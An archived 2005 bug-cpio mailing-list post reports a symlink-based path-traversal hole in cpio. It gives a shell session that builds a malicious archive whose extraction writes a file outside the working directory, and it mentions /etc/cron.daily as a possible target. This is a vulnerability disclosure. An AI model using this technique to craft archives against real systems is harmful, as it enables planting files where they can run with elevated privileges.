[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Bug-cpio] Re: Bug#306693: cpio: allows extracting insecure pathnames (l
From: |
t takahashi |
Subject: |
[Bug-cpio] Re: Bug#306693: cpio: allows extracting insecure pathnames (leading slash = / and dotdot = ..) |
Date: |
Wed, 27 Apr 2005 19:54:54 -0700 |
P.P.S. I found a more subtle security hole. It is even more dangerous.
/tmp/aaa$ mkdir ../b
/tmp/aaa$ ln -s ../b b
/tmp/aaa$ touch ../b/trojan
/tmp/aaa$ ls b
trojan
/tmp/aaa$ find b b/trojan
b
b/trojan
/tmp/aaa$ find b b/trojan | cpio -o > dangerous
cpio: b: truncating inode number
cpio: b/trojan: truncating inode number
1 block
/tmp/aaa$ /bin/rm -v b/trojan b
removed `b/trojan'
removed `b'
/tmp/aaa$ ls
dangerous
/tmp/aaa$ cpio -t<dangerous
b
b/trojan
1 block
/tmp/aaa$ cpio -vt<dangerous
lrwxrwxrwx 1 kpc kpc 4 Apr 27 19:46 b -> ../b
-rw------- 1 kpc kpc 0 Apr 27 19:46 b/trojan
1 block
Notice that grep '\.\.' on the output of cpio -t would not find the
relative pathname. You have to use cpio -vt. Now watch this:
/tmp/aaa$ cpio -i<dangerous
1 block
/tmp/aaa$ ls
b dangerous
/tmp/aaa$ ls ../b
trojan
IMHO cpio should disallow this by default. Imagine
../../../../../../../etc/cron.daily again. cpio should check for
extracting in directories that are not below pwd, even if it is via
indirect means such as a symlink.
Wow!
- [Bug-cpio] Re: Bug#306693: cpio: allows extracting insecure pathnames (leading slash = / and dotdot = ..),
t takahashi <=